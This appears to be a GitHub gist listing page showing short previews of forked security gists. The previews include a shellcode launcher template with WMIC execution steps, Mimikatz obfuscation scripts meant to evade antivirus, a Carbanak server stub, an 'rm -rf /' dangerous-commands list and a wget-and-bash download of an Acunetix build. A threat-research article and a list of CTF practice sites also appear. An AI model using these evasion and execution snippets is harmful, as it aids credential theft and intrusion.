Mỗi lần chạy thì chạy nó 1 lần lệnh bash bên dưới
wget -O acunetix.sh https://l.manhtuong.net/3q1vOHs
bash acunetix.sh vouu/acuss:14.7.220228146
Darksidesfear
/ generic-shellcode-launcher.cs
Created
October 23, 2024 22:27
— forked from 0xhexmex/generic-shellcode-launcher.cs
wmic code execution template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs | |
| // Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs | |
| // Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll | |
| // mylauncher.js can be put into something like a WMIC XSL template like so... | |
| /* | |
| // wmic-template.xsl | |
| // wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe) |
Darksidesfear
/ North Korean Cyber-Attacks and Collateral Damage.txt
Created
October 6, 2024 12:57
— forked from chrisdoman/North Korean Cyber-Attacks and Collateral Damage.txt
North Korean Cyber-Attacks and Collateral Damage
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| North Korean Cyber-Attacks and Collateral Damage | |
| February 15, 2018 | Chris Doman | |
| WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. | |
| There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. | |
| Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK. | |
| The Voice of Korea and the Rivts Virus | |
| This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet. |
Darksidesfear
/ server.py
Created
October 5, 2024 14:06
— forked from ecks/server.py
Carbanak Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import hashlib | |
| import struct | |
| import time | |
| class IdUid: | |
| def __init__(self): |
Darksidesfear
/ Readme.md
Created
October 2, 2024 10:47
— forked from vncloudsco/Readme.md
Acunetix Build Version 14 build 14.7.220228146 Run on Docker
Darksidesfear
/ danger_cmd.sh
Created
September 29, 2024 13:35
— forked from ManishLSN/danger_cmd.sh
Most Dangerous command in Linux
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| There are plenty of one line terminal commands that can prove to be exorbitantly dangerous. | |
| 1. The Delete Everything Command | |
| rm -rf / | |
| This command deletes everything it possibly can, including files on your hard drive and files on connected removable media devices. This command can be explained as follows: | |
| rm – Remove the following files. | |
| -rf – Run rm recursively. |
Darksidesfear
/ 22 Hacking Sites To Practice Your Hacking Skills
Created
September 25, 2024 20:21
— forked from numberwhun/22 Hacking Sites To Practice Your Hacking Skills
22 Hacking Sites To Practice Your Hacking Skills
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Taken from: https://hackerlists.com/hacking-sites/ | |
| 22 Hacking Sites, CTFs and Wargames To Practice Your Hacking Skills | |
| InfoSec skills are in such high demand right now. As the world continues to turn everything into an app and connect even the most basic devices to the internet, the demand is only going to grow, so it’s no surprise everyone wants to learn hacking these days. | |
| However, almost every day I come across a forum post where someone is asking where they should begin to learn hacking or how to practice hacking. I’ve compiled this list of some of the best hacking sites to hopefully be a valuable resource for those wondering how they can build and practice their hacking skill set. I hope you find this list helpful, and if you know of any other quality hacking sites, please let me know in the comments, so I can add them to the list. | |
| 1. CTF365 https://ctf365.com/ |
Darksidesfear
/ mimikatz_obfuscator.sh
Created
September 18, 2024 23:36
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
Darksidesfear
/ mimikatz_obfuscator.sh
Created
September 18, 2024 23:36
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
Darksidesfear
/ obfuscate-mimikatz.sh
Created
September 18, 2024 23:33
— forked from infosecn1nja/obfuscate-mimikatz.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $# -le 1 ]] ; then | |
| echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1' | |
| exit 1 | |
| fi | |
| randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} | |
| cp $1 $2 |
Darksidesfear
/ Exploitation.md
Created
August 28, 2024 18:37
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
NewerOlder